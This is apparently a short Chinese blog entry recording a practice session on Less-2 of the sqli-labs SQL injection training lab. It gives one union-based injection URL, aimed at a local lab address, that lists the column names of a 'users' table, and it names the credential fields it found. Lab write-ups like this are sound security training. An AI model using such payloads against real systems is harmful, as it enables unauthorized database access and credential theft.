sql-lib每日一记_Less2(day2)

SQL-Lib_Less2




  • 爆破security数据库表


  • 爆破users表中的字段

    • http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=”security” and table_name=”users”

    • 得到了id,username,password 三个字段


    • 提取字段中的username和password内容

文章作者: Fre3L3i
文章链接: http://fre3l3i.github.io/2019/11/28/sql-lib每日一记-Less2-day2/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Fre3L3i's blogs

评论